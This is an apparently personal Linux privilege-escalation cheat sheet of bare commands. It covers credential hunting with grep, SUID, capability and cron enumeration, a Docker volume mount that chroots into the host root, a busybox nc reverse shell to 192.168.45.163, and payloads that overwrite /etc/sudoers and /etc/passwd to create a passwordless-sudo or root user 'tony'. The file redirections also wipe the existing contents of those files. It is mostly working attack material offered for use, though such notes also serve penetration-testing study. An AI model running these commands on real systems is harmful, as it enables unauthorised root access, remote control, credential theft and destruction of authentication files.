Sudo
sudo -l
Credential Find:
find . -type f -exec grep -iIl -- "password =" {} + 2>/dev/null
Gourp:
id
Opt
cd /opt
ls
SUID Files
find / -type f -perm -4000 2>/dev/null
Writeable Path
find / -type d -maxdepth 5 -writable 2>/dev/null
Binary Capabilities:
getcap -r / 2>/dev/null
Scheduled Tasks
cat /etc/crontab
./pspy64
Local listening ports
netstat -antup | grep -ni listen
grep -nRw '8080\|8081' /etc/* 2>/dev/null
Docker
docker images
docker run -v /:/mnt --rm -it redmine chroot /mnt bash
Payload
busybox nc 192.168.45.163 80 -e /bin/bash
echo "user ALL=(root) NOPASSWD: ALL" > /etc/sudoers
echo 'tony:$1$test$28Tmd0tsvqI1Eq.TDxcaq/:0:0:tony,,,:/root:/bin/bash' > /etc/passwd;
tony:password